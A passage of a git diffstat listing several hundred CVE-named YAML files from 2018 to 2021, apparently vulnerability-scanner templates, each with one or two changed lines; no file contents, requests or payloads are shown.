http/cves/2018/CVE-2018-16763.yaml | 2 +- http/cves/2018/CVE-2018-16836.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2018/CVE-2018-17254.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2018/CVE-2018-17431.yaml | 2 +- http/cves/2018/CVE-2018-18069.yaml | 2 +- http/cves/2018/CVE-2018-18264.yaml | 2 +- http/cves/2018/CVE-2018-18323.yaml | 2 +- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 2 +- http/cves/2018/CVE-2018-18775.yaml | 2 +- http/cves/2018/CVE-2018-18777.yaml | 2 +- http/cves/2018/CVE-2018-18778.yaml | 2 +- http/cves/2018/CVE-2018-18925.yaml | 2 +- http/cves/2018/CVE-2018-19136.yaml | 2 +- http/cves/2018/CVE-2018-19137.yaml | 2 +- http/cves/2018/CVE-2018-19287.yaml | 2 +- http/cves/2018/CVE-2018-19326.yaml | 2 +- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19439.yaml | 2 +- http/cves/2018/CVE-2018-19458.yaml | 2 +- http/cves/2018/CVE-2018-19749.yaml | 2 +- http/cves/2018/CVE-2018-19751.yaml | 2 +- http/cves/2018/CVE-2018-19752.yaml | 2 +- http/cves/2018/CVE-2018-19753.yaml | 2 +- http/cves/2018/CVE-2018-19877.yaml | 2 +- http/cves/2018/CVE-2018-19892.yaml | 2 +- http/cves/2018/CVE-2018-19914.yaml | 2 +- http/cves/2018/CVE-2018-19915.yaml | 2 +- http/cves/2018/CVE-2018-20009.yaml | 2 +- http/cves/2018/CVE-2018-20010.yaml | 2 +- http/cves/2018/CVE-2018-20011.yaml | 2 +- http/cves/2018/CVE-2018-20462.yaml | 2 +- http/cves/2018/CVE-2018-20463.yaml | 2 +- http/cves/2018/CVE-2018-20470.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-20985.yaml | 2 +- http/cves/2018/CVE-2018-2392.yaml | 2 +- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-2894.yaml | 2 +- http/cves/2018/CVE-2018-3167.yaml | 2 +- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-3714.yaml | 2 +- http/cves/2018/CVE-2018-3760.yaml | 2 +- http/cves/2018/CVE-2018-3810.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 2 +- http/cves/2018/CVE-2018-5233.yaml | 2 +- http/cves/2018/CVE-2018-5316.yaml | 2 +- http/cves/2018/CVE-2018-5715.yaml | 2 +- http/cves/2018/CVE-2018-6008.yaml | 2 +- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 2 +- http/cves/2018/CVE-2018-6910.yaml | 2 +- http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7422.yaml | 2 +- http/cves/2018/CVE-2018-7467.yaml | 2 +- http/cves/2018/CVE-2018-7490.yaml | 2 +- http/cves/2018/CVE-2018-7600.yaml | 2 +- http/cves/2018/CVE-2018-7602.yaml | 2 +- http/cves/2018/CVE-2018-7662.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-7719.yaml | 2 +- http/cves/2018/CVE-2018-8006.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 2 +- http/cves/2018/CVE-2018-8715.yaml | 2 +- http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8727.yaml | 2 +- http/cves/2018/CVE-2018-8770.yaml | 2 +- http/cves/2018/CVE-2018-9118.yaml | 2 +- http/cves/2018/CVE-2018-9161.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2018/CVE-2018-9845.yaml | 2 +- http/cves/2018/CVE-2018-9995.yaml | 2 +- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 2 +- http/cves/2019/CVE-2019-10068.yaml | 2 +- http/cves/2019/CVE-2019-10092.yaml | 2 +- http/cves/2019/CVE-2019-1010287.yaml | 2 +- http/cves/2019/CVE-2019-1010290.yaml | 2 +- http/cves/2019/CVE-2019-10232.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 2 +- http/cves/2019/CVE-2019-10475.yaml | 2 +- http/cves/2019/CVE-2019-10692.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 2 +- http/cves/2019/CVE-2019-10758.yaml | 2 +- http/cves/2019/CVE-2019-11013.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 2 +- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11510.yaml | 2 +- http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11581.yaml | 2 +- http/cves/2019/CVE-2019-11869.yaml | 2 +- http/cves/2019/CVE-2019-12276.yaml | 2 +- http/cves/2019/CVE-2019-12314.yaml | 2 +- http/cves/2019/CVE-2019-12461.yaml | 2 +- http/cves/2019/CVE-2019-12581.yaml | 2 +- http/cves/2019/CVE-2019-12583.yaml | 2 +- http/cves/2019/CVE-2019-12593.yaml | 2 +- http/cves/2019/CVE-2019-12616.yaml | 2 +- http/cves/2019/CVE-2019-12725.yaml | 2 +- http/cves/2019/CVE-2019-12962.yaml | 2 +- http/cves/2019/CVE-2019-12985.yaml | 2 +- http/cves/2019/CVE-2019-12986.yaml | 2 +- http/cves/2019/CVE-2019-12987.yaml | 2 +- http/cves/2019/CVE-2019-12988.yaml | 2 +- http/cves/2019/CVE-2019-12990.yaml | 2 +- http/cves/2019/CVE-2019-13101.yaml | 2 +- http/cves/2019/CVE-2019-13392.yaml | 2 +- http/cves/2019/CVE-2019-13396.yaml | 2 +- http/cves/2019/CVE-2019-13462.yaml | 2 +- http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 2 +- http/cves/2019/CVE-2019-14251.yaml | 2 +- http/cves/2019/CVE-2019-14312.yaml | 2 +- http/cves/2019/CVE-2019-14322.yaml | 2 +- http/cves/2019/CVE-2019-14470.yaml | 2 +- http/cves/2019/CVE-2019-14530.yaml | 2 +- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14974.yaml | 2 +- http/cves/2019/CVE-2019-15043.yaml | 2 +- http/cves/2019/CVE-2019-15107.yaml | 2 +- http/cves/2019/CVE-2019-15501.yaml | 2 +- http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15811.yaml | 2 +- http/cves/2019/CVE-2019-15858.yaml | 2 +- http/cves/2019/CVE-2019-15859.yaml | 2 +- http/cves/2019/CVE-2019-15889.yaml | 2 +- http/cves/2019/CVE-2019-16097.yaml | 2 +- http/cves/2019/CVE-2019-16123.yaml | 2 +- http/cves/2019/CVE-2019-16278.yaml | 2 +- http/cves/2019/CVE-2019-16313.yaml | 2 +- http/cves/2019/CVE-2019-16332.yaml | 2 +- http/cves/2019/CVE-2019-16525.yaml | 2 +- http/cves/2019/CVE-2019-1653.yaml | 2 +- http/cves/2019/CVE-2019-16662.yaml | 2 +- http/cves/2019/CVE-2019-16759.yaml | 2 +- http/cves/2019/CVE-2019-16920.yaml | 2 +- http/cves/2019/CVE-2019-16931.yaml | 2 +- http/cves/2019/CVE-2019-16932.yaml | 2 +- http/cves/2019/CVE-2019-16996.yaml | 2 +- http/cves/2019/CVE-2019-16997.yaml | 2 +- http/cves/2019/CVE-2019-17270.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2019/CVE-2019-17418.yaml | 2 +- http/cves/2019/CVE-2019-17444.yaml | 2 +- http/cves/2019/CVE-2019-17503.yaml | 2 +- http/cves/2019/CVE-2019-17506.yaml | 2 +- http/cves/2019/CVE-2019-17538.yaml | 2 +- http/cves/2019/CVE-2019-17558.yaml | 2 +- http/cves/2019/CVE-2019-1821.yaml | 2 +- http/cves/2019/CVE-2019-18371.yaml | 2 +- http/cves/2019/CVE-2019-18393.yaml | 2 +- http/cves/2019/CVE-2019-18665.yaml | 2 +- http/cves/2019/CVE-2019-18818.yaml | 2 +- http/cves/2019/CVE-2019-18922.yaml | 2 +- http/cves/2019/CVE-2019-18957.yaml | 2 +- http/cves/2019/CVE-2019-19134.yaml | 2 +- http/cves/2019/CVE-2019-19368.yaml | 2 +- http/cves/2019/CVE-2019-19781.yaml | 2 +- http/cves/2019/CVE-2019-19824.yaml | 2 +- http/cves/2019/CVE-2019-19908.yaml | 2 +- http/cves/2019/CVE-2019-19985.yaml | 2 +- http/cves/2019/CVE-2019-20085.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 2 +- http/cves/2019/CVE-2019-20210.yaml | 2 +- http/cves/2019/CVE-2019-20224.yaml | 2 +- http/cves/2019/CVE-2019-20933.yaml | 2 +- http/cves/2019/CVE-2019-2578.yaml | 2 +- http/cves/2019/CVE-2019-2579.yaml | 2 +- http/cves/2019/CVE-2019-2588.yaml | 2 +- http/cves/2019/CVE-2019-2616.yaml | 2 +- http/cves/2019/CVE-2019-2725.yaml | 2 +- http/cves/2019/CVE-2019-2729.yaml | 2 +- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3396.yaml | 2 +- http/cves/2019/CVE-2019-3401.yaml | 2 +- http/cves/2019/CVE-2019-3402.yaml | 2 +- http/cves/2019/CVE-2019-3799.yaml | 2 +- http/cves/2019/CVE-2019-3911.yaml | 2 +- http/cves/2019/CVE-2019-3912.yaml | 2 +- http/cves/2019/CVE-2019-3929.yaml | 2 +- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5418.yaml | 2 +- http/cves/2019/CVE-2019-5434.yaml | 2 +- http/cves/2019/CVE-2019-6112.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 2 +- http/cves/2019/CVE-2019-6715.yaml | 2 +- http/cves/2019/CVE-2019-6799.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 2 +- http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 2 +- http/cves/2019/CVE-2019-7255.yaml | 2 +- http/cves/2019/CVE-2019-7256.yaml | 2 +- http/cves/2019/CVE-2019-7275.yaml | 2 +- http/cves/2019/CVE-2019-7315.yaml | 2 +- http/cves/2019/CVE-2019-7481.yaml | 2 +- http/cves/2019/CVE-2019-7543.yaml | 2 +- http/cves/2019/CVE-2019-7609.yaml | 2 +- http/cves/2019/CVE-2019-8086.yaml | 2 +- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 2 +- http/cves/2019/CVE-2019-8451.yaml | 2 +- http/cves/2019/CVE-2019-8903.yaml | 2 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-8982.yaml | 2 +- http/cves/2019/CVE-2019-9041.yaml | 2 +- http/cves/2019/CVE-2019-9618.yaml | 2 +- http/cves/2019/CVE-2019-9670.yaml | 2 +- http/cves/2019/CVE-2019-9726.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9915.yaml | 2 +- http/cves/2019/CVE-2019-9922.yaml | 2 +- http/cves/2019/CVE-2019-9955.yaml | 2 +- http/cves/2019/CVE-2019-9978.yaml | 2 +- http/cves/2020/CVE-2020-0618.yaml | 2 +- http/cves/2020/CVE-2020-10148.yaml | 2 +- http/cves/2020/CVE-2020-10546.yaml | 2 +- http/cves/2020/CVE-2020-10547.yaml | 2 +- http/cves/2020/CVE-2020-10548.yaml | 2 +- http/cves/2020/CVE-2020-10549.yaml | 2 +- http/cves/2020/CVE-2020-10770.yaml | 2 +- http/cves/2020/CVE-2020-10973.yaml | 2 +- http/cves/2020/CVE-2020-11034.yaml | 2 +- http/cves/2020/CVE-2020-11110.yaml | 2 +- http/cves/2020/CVE-2020-11450.yaml | 2 +- http/cves/2020/CVE-2020-11455.yaml | 2 +- http/cves/2020/CVE-2020-11529.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-11546.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2020/CVE-2020-11710.yaml | 2 +- http/cves/2020/CVE-2020-11738.yaml | 2 +- http/cves/2020/CVE-2020-11853.yaml | 2 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11978.yaml | 2 +- http/cves/2020/CVE-2020-11991.yaml | 2 +- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12116.yaml | 2 +- http/cves/2020/CVE-2020-12127.yaml | 2 +- http/cves/2020/CVE-2020-12447.yaml | 2 +- http/cves/2020/CVE-2020-12478.yaml | 2 +- http/cves/2020/CVE-2020-12720.yaml | 2 +- http/cves/2020/CVE-2020-12800.yaml | 2 +- http/cves/2020/CVE-2020-13117.yaml | 1 - http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 2 +- http/cves/2020/CVE-2020-13167.yaml | 2 +- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13405.yaml | 2 +- http/cves/2020/CVE-2020-13483.yaml | 2 +- http/cves/2020/CVE-2020-13700.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 2 +- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13937.yaml | 2 +- http/cves/2020/CVE-2020-13942.yaml | 2 +- http/cves/2020/CVE-2020-13945.yaml | 2 +- http/cves/2020/CVE-2020-14092.yaml | 2 +- http/cves/2020/CVE-2020-14144.yaml | 2 +- http/cves/2020/CVE-2020-14179.yaml | 2 +- http/cves/2020/CVE-2020-14181.yaml | 2 +- http/cves/2020/CVE-2020-14408.yaml | 2 +- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14750.yaml | 2 +- http/cves/2020/CVE-2020-14864.yaml | 2 +- http/cves/2020/CVE-2020-14882.yaml | 2 +- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15050.yaml | 2 +- http/cves/2020/CVE-2020-15129.yaml | 2 +- http/cves/2020/CVE-2020-15148.yaml | 2 +- http/cves/2020/CVE-2020-15227.yaml | 2 +- http/cves/2020/CVE-2020-15500.yaml | 2 +- http/cves/2020/CVE-2020-15505.yaml | 2 +- http/cves/2020/CVE-2020-15568.yaml | 2 +- http/cves/2020/CVE-2020-15867.yaml | 2 +- http/cves/2020/CVE-2020-15895.yaml | 2 +- http/cves/2020/CVE-2020-15920.yaml | 2 +- http/cves/2020/CVE-2020-16139.yaml | 2 +- http/cves/2020/CVE-2020-16846.yaml | 2 +- http/cves/2020/CVE-2020-16952.yaml | 2 +- http/cves/2020/CVE-2020-17362.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 2 +- http/cves/2020/CVE-2020-17456.yaml | 2 +- http/cves/2020/CVE-2020-17496.yaml | 2 +- http/cves/2020/CVE-2020-17505.yaml | 2 +- http/cves/2020/CVE-2020-17506.yaml | 2 +- http/cves/2020/CVE-2020-17518.yaml | 2 +- http/cves/2020/CVE-2020-17519.yaml | 2 +- http/cves/2020/CVE-2020-17526.yaml | 2 +- http/cves/2020/CVE-2020-17530.yaml | 2 +- http/cves/2020/CVE-2020-18268.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 2 +- http/cves/2020/CVE-2020-19283.yaml | 2 +- http/cves/2020/CVE-2020-19295.yaml | 2 +- http/cves/2020/CVE-2020-19360.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 2 +- http/cves/2020/CVE-2020-19625.yaml | 2 +- http/cves/2020/CVE-2020-20285.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 2 +- http/cves/2020/CVE-2020-2036.yaml | 2 +- http/cves/2020/CVE-2020-2096.yaml | 2 +- http/cves/2020/CVE-2020-20982.yaml | 2 +- http/cves/2020/CVE-2020-20988.yaml | 2 +- http/cves/2020/CVE-2020-21012.yaml | 2 +- http/cves/2020/CVE-2020-2103.yaml | 2 +- http/cves/2020/CVE-2020-21224.yaml | 2 +- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 2 +- http/cves/2020/CVE-2020-22209.yaml | 2 +- http/cves/2020/CVE-2020-22210.yaml | 2 +- http/cves/2020/CVE-2020-22211.yaml | 2 +- http/cves/2020/CVE-2020-22840.yaml | 2 +- http/cves/2020/CVE-2020-23015.yaml | 2 +- http/cves/2020/CVE-2020-23517.yaml | 2 +- http/cves/2020/CVE-2020-23575.yaml | 2 +- http/cves/2020/CVE-2020-23697.yaml | 2 +- http/cves/2020/CVE-2020-23972.yaml | 2 +- http/cves/2020/CVE-2020-24148.yaml | 2 +- http/cves/2020/CVE-2020-24186.yaml | 2 +- http/cves/2020/CVE-2020-24223.yaml | 2 +- http/cves/2020/CVE-2020-24312.yaml | 2 +- http/cves/2020/CVE-2020-24391.yaml | 2 +- http/cves/2020/CVE-2020-24550.yaml | 2 +- http/cves/2020/CVE-2020-24571.yaml | 2 +- http/cves/2020/CVE-2020-24579.yaml | 2 +- http/cves/2020/CVE-2020-24589.yaml | 2 +- http/cves/2020/CVE-2020-24902.yaml | 2 +- http/cves/2020/CVE-2020-24903.yaml | 2 +- http/cves/2020/CVE-2020-24912.yaml | 2 +- http/cves/2020/CVE-2020-24949.yaml | 2 +- http/cves/2020/CVE-2020-25078.yaml | 2 +- http/cves/2020/CVE-2020-25213.yaml | 2 +- http/cves/2020/CVE-2020-25223.yaml | 2 +- http/cves/2020/CVE-2020-25495.yaml | 2 +- http/cves/2020/CVE-2020-25506.yaml | 2 +- http/cves/2020/CVE-2020-2551.yaml | 2 +- http/cves/2020/CVE-2020-25540.yaml | 2 +- http/cves/2020/CVE-2020-25780.yaml | 2 +- http/cves/2020/CVE-2020-25864.yaml | 2 +- http/cves/2020/CVE-2020-26073.yaml | 2 +- http/cves/2020/CVE-2020-26153.yaml | 2 +- http/cves/2020/CVE-2020-26214.yaml | 2 +- http/cves/2020/CVE-2020-26217.yaml | 2 +- http/cves/2020/CVE-2020-26248.yaml | 2 +- http/cves/2020/CVE-2020-26258.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 2 +- http/cves/2020/CVE-2020-26876.yaml | 2 +- http/cves/2020/CVE-2020-26919.yaml | 2 +- http/cves/2020/CVE-2020-26948.yaml | 2 +- http/cves/2020/CVE-2020-27191.yaml | 2 +- http/cves/2020/CVE-2020-2733.yaml | 2 +- http/cves/2020/CVE-2020-27361.yaml | 2 +- http/cves/2020/CVE-2020-27467.yaml | 2 +- http/cves/2020/CVE-2020-27735.yaml | 2 +- http/cves/2020/CVE-2020-27866.yaml | 2 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-27986.yaml | 2 +- http/cves/2020/CVE-2020-28188.yaml | 2 +- http/cves/2020/CVE-2020-28208.yaml | 2 +- http/cves/2020/CVE-2020-28351.yaml | 2 +- http/cves/2020/CVE-2020-28976.yaml | 2 +- http/cves/2020/CVE-2020-29164.yaml | 2 +- http/cves/2020/CVE-2020-29227.yaml | 2 +- http/cves/2020/CVE-2020-29284.yaml | 2 +- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29453.yaml | 2 +- http/cves/2020/CVE-2020-29597.yaml | 2 +- http/cves/2020/CVE-2020-3187.yaml | 2 +- http/cves/2020/CVE-2020-3452.yaml | 2 +- http/cves/2020/CVE-2020-35234.yaml | 2 +- http/cves/2020/CVE-2020-35338.yaml | 2 +- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35489.yaml | 2 +- http/cves/2020/CVE-2020-35580.yaml | 2 +- http/cves/2020/CVE-2020-35598.yaml | 2 +- http/cves/2020/CVE-2020-35713.yaml | 2 +- http/cves/2020/CVE-2020-35729.yaml | 2 +- http/cves/2020/CVE-2020-35736.yaml | 2 +- http/cves/2020/CVE-2020-35749.yaml | 2 +- http/cves/2020/CVE-2020-35774.yaml | 2 +- http/cves/2020/CVE-2020-3580.yaml | 2 +- http/cves/2020/CVE-2020-35846.yaml | 2 +- http/cves/2020/CVE-2020-35848.yaml | 2 +- http/cves/2020/CVE-2020-35951.yaml | 2 +- http/cves/2020/CVE-2020-36112.yaml | 2 +- http/cves/2020/CVE-2020-36289.yaml | 2 +- http/cves/2020/CVE-2020-36365.yaml | 2 +- http/cves/2020/CVE-2020-36510.yaml | 2 +- http/cves/2020/CVE-2020-4463.yaml | 2 +- http/cves/2020/CVE-2020-5191.yaml | 2 +- http/cves/2020/CVE-2020-5192.yaml | 2 +- http/cves/2020/CVE-2020-5284.yaml | 2 +- http/cves/2020/CVE-2020-5307.yaml | 2 +- http/cves/2020/CVE-2020-5405.yaml | 2 +- http/cves/2020/CVE-2020-5410.yaml | 2 +- http/cves/2020/CVE-2020-5412.yaml | 2 +- http/cves/2020/CVE-2020-5775.yaml | 2 +- http/cves/2020/CVE-2020-5776.yaml | 2 +- http/cves/2020/CVE-2020-5777.yaml | 2 +- http/cves/2020/CVE-2020-5847.yaml | 2 +- http/cves/2020/CVE-2020-5902.yaml | 2 +- http/cves/2020/CVE-2020-6171.yaml | 2 +- http/cves/2020/CVE-2020-6207.yaml | 2 +- http/cves/2020/CVE-2020-6287.yaml | 2 +- http/cves/2020/CVE-2020-6308.yaml | 2 +- http/cves/2020/CVE-2020-6637.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 2 +- http/cves/2020/CVE-2020-7136.yaml | 2 +- http/cves/2020/CVE-2020-7209.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7943.yaml | 2 +- http/cves/2020/CVE-2020-7961.yaml | 2 +- http/cves/2020/CVE-2020-7980.yaml | 2 +- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8163.yaml | 2 +- http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8193.yaml | 2 +- http/cves/2020/CVE-2020-8194.yaml | 2 +- http/cves/2020/CVE-2020-8209.yaml | 2 +- http/cves/2020/CVE-2020-8497.yaml | 2 +- http/cves/2020/CVE-2020-8512.yaml | 2 +- http/cves/2020/CVE-2020-8515.yaml | 2 +- http/cves/2020/CVE-2020-8641.yaml | 2 +- http/cves/2020/CVE-2020-8644.yaml | 1 - http/cves/2020/CVE-2020-8654.yaml | 2 +- http/cves/2020/CVE-2020-8771.yaml | 2 +- http/cves/2020/CVE-2020-8772.yaml | 2 +- http/cves/2020/CVE-2020-8813.yaml | 2 +- http/cves/2020/CVE-2020-8982.yaml | 2 +- http/cves/2020/CVE-2020-9036.yaml | 2 +- http/cves/2020/CVE-2020-9043.yaml | 2 +- http/cves/2020/CVE-2020-9047.yaml | 2 +- http/cves/2020/CVE-2020-9054.yaml | 2 +- http/cves/2020/CVE-2020-9315.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9376.yaml | 2 +- http/cves/2020/CVE-2020-9402.yaml | 2 +- http/cves/2020/CVE-2020-9425.yaml | 2 +- http/cves/2020/CVE-2020-9483.yaml | 2 +- http/cves/2020/CVE-2020-9484.yaml | 2 +- http/cves/2020/CVE-2020-9496.yaml | 2 +- http/cves/2020/CVE-2020-9757.yaml | 2 +- http/cves/2021/CVE-2021-1472.yaml | 2 +- http/cves/2021/CVE-2021-1497.yaml | 2 +- http/cves/2021/CVE-2021-1498.yaml | 2 +- http/cves/2021/CVE-2021-1499.yaml | 2 +- http/cves/2021/CVE-2021-20031.yaml | 2 +- http/cves/2021/CVE-2021-20038.yaml | 2 +- http/cves/2021/CVE-2021-20090.yaml | 2 +- http/cves/2021/CVE-2021-20091.yaml | 2 +- http/cves/2021/CVE-2021-20092.yaml | 2 +- http/cves/2021/CVE-2021-20114.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 2 +- http/cves/2021/CVE-2021-20124.yaml | 2 +- http/cves/2021/CVE-2021-20137.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 2 +- http/cves/2021/CVE-2021-20158.yaml | 2 +- http/cves/2021/CVE-2021-20167.yaml | 2 +- http/cves/2021/CVE-2021-20323.yaml | 2 +- http/cves/2021/CVE-2021-20792.yaml | 2 +- http/cves/2021/CVE-2021-20837.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 2 +- http/cves/2021/CVE-2021-21234.yaml | 2 +- http/cves/2021/CVE-2021-21287.yaml | 2 +- http/cves/2021/CVE-2021-21307.yaml | 2 +- http/cves/2021/CVE-2021-21311.yaml | 2 +- http/cves/2021/CVE-2021-21315.yaml | 2 +- http/cves/2021/CVE-2021-21351.yaml | 2 +- http/cves/2021/CVE-2021-21389.yaml | 2 +- http/cves/2021/CVE-2021-21402.yaml | 2 +- http/cves/2021/CVE-2021-21479.yaml | 2 +- http/cves/2021/CVE-2021-21745.yaml | 2 +- http/cves/2021/CVE-2021-21799.yaml | 2 +- http/cves/2021/CVE-2021-21800.yaml | 2 +- http/cves/2021/CVE-2021-21801.yaml | 2 +- http/cves/2021/CVE-2021-21802.yaml | 2 +- http/cves/2021/CVE-2021-21803.yaml | 2 +- http/cves/2021/CVE-2021-21805.yaml | 2 +- http/cves/2021/CVE-2021-21816.yaml | 2 +- http/cves/2021/CVE-2021-21881.yaml | 2 +- http/cves/2021/CVE-2021-21972.yaml | 2 +- http/cves/2021/CVE-2021-21973.yaml | 2 +- http/cves/2021/CVE-2021-21975.yaml | 2 +- http/cves/2021/CVE-2021-21978.yaml | 2 +- http/cves/2021/CVE-2021-21985.yaml | 2 +- http/cves/2021/CVE-2021-22005.yaml | 2 +- http/cves/2021/CVE-2021-22053.yaml | 2 +- http/cves/2021/CVE-2021-22054.yaml | 1 - http/cves/2021/CVE-2021-22122.yaml | 2 +- http/cves/2021/CVE-2021-22145.yaml | 2 +- http/cves/2021/CVE-2021-22205.yaml | 2 +- http/cves/2021/CVE-2021-22214.yaml | 2 +- http/cves/2021/CVE-2021-22502.yaml | 2 +- http/cves/2021/CVE-2021-22873.yaml | 2 +- http/cves/2021/CVE-2021-22911.yaml | 2 +- http/cves/2021/CVE-2021-22986.yaml | 2 +- http/cves/2021/CVE-2021-23241.yaml | 2 +- http/cves/2021/CVE-2021-24145.yaml | 2 +- http/cves/2021/CVE-2021-24146.yaml | 2 +- http/cves/2021/CVE-2021-24150.yaml | 2 +- http/cves/2021/CVE-2021-24155.yaml | 2 +- http/cves/2021/CVE-2021-24165.yaml | 2 +- http/cves/2021/CVE-2021-24169.yaml | 2 +- http/cves/2021/CVE-2021-24176.yaml | 2 +- http/cves/2021/CVE-2021-24210.yaml | 2 +- http/cves/2021/CVE-2021-24214.yaml | 2 +- http/cves/2021/CVE-2021-24226.yaml | 2 +- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 2 +- http/cves/2021/CVE-2021-24236.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 2 +- http/cves/2021/CVE-2021-24245.yaml | 2 +- http/cves/2021/CVE-2021-24274.yaml | 2 +- http/cves/2021/CVE-2021-24275.yaml | 2 +- http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24278.yaml | 2 +- http/cves/2021/CVE-2021-24284.yaml | 2 +- http/cves/2021/CVE-2021-24285.yaml | 2 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 2 +- http/cves/2021/CVE-2021-24291.yaml | 2 +- http/cves/2021/CVE-2021-24298.yaml | 2 +- http/cves/2021/CVE-2021-24300.yaml | 2 +- http/cves/2021/CVE-2021-24316.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 2 +- http/cves/2021/CVE-2021-24335.yaml | 2 +- http/cves/2021/CVE-2021-24342.yaml | 2 +- http/cves/2021/CVE-2021-24347.yaml | 2 +- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24358.yaml | 2 +- http/cves/2021/CVE-2021-24364.yaml | 2 +- http/cves/2021/CVE-2021-24370.yaml | 2 +- http/cves/2021/CVE-2021-24387.yaml | 2 +- http/cves/2021/CVE-2021-24389.yaml | 2 +- http/cves/2021/CVE-2021-24406.yaml | 2 +- http/cves/2021/CVE-2021-24407.yaml | 2 +- http/cves/2021/CVE-2021-24436.yaml | 2 +- http/cves/2021/CVE-2021-24452.yaml | 2 +- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24488.yaml | 2 +- http/cves/2021/CVE-2021-24495.yaml | 2 +- http/cves/2021/CVE-2021-24498.yaml | 2 +- http/cves/2021/CVE-2021-24499.yaml | 2 +- http/cves/2021/CVE-2021-24510.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 2 +- http/cves/2021/CVE-2021-24666.yaml | 2 +- http/cves/2021/CVE-2021-24746.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 2 +- 